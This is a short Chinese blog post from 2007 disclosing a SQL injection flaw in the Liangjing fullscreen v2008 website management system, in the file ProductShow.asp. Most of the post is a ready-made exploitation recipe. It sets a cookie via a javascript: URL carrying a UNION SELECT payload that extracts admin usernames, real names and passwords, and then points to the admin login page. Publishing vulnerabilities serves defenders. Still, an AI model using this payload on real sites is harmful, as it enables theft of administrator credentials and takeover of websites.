|
良精全屏v2008网站管理系统 Sql注入漏洞
樱木花盗 发表于 2007-8-24 3:06:53 |
良精全屏v2008网站管理系统 Sql注入漏洞
Author:Tr4c3[at]126[dot]com
http://www.nspcn.org
http://www.tr4c3.com
涉及版本:良精全屏v2008网站管理系统
漏洞文件:ProductShow.asp
漏洞描述:参考良精企业网站管理系统漏洞
http://www.tr4c3.com/post/201.html
http://hi.baidu.com/tr4c3/blog/item/6ea6d258c84ad683810a1878.html
利用方法:
1.http://www.tr4c3.com/Chinese/ProductShow.asp?ArticleID=126
2.javascript:alert(document.cookie="ArticleID="+escape("126 union select 0,1,2,3,4,5,6,username,8,realname,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24 from admin"))
3.http://www.tr4c3.com/Chinese/ProductShow.asp
后台
http://www.tr4c3.com/boss/login.asp
拿shell方法略过
|
|
发表评论:
|
